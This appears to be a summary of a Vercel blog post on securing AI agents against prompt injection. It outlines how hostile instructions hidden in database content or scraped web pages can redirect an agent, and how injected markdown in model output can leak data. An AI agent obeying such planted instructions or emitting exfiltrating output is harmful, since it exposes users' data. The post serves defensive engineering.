Building secure AI agents
Blog post from Vercel
AI agents, which are language models equipped with system prompts and tools, face significant security risks, primarily from prompt injection attacks. These attacks are akin to SQL injection, allowing malicious inputs to be embedded within seemingly normal data, thereby compromising the agent's operations. Developers are advised to assume total compromise of the prompt, ensuring tools are scoped strictly to user authority and designing systems with the possibility of every input being compromised in mind. Prompt injections can stem from indirect inputs like database content or web-scraped data, posing a threat even when tools are properly authorized. Exfiltration risks also exist through model outputs, such as rendering injected markdown that can trigger unintended data leaks. To mitigate these risks, developers should treat model outputs as untrusted by default, sanitize outputs before rendering, and apply additional security measures like CSP rules and specialized packages for secure markdown handling. Building agents should focus on minimizing the impact of failures rather than trusting the model to adhere to rules, emphasizing the importance of designing for security from the outset.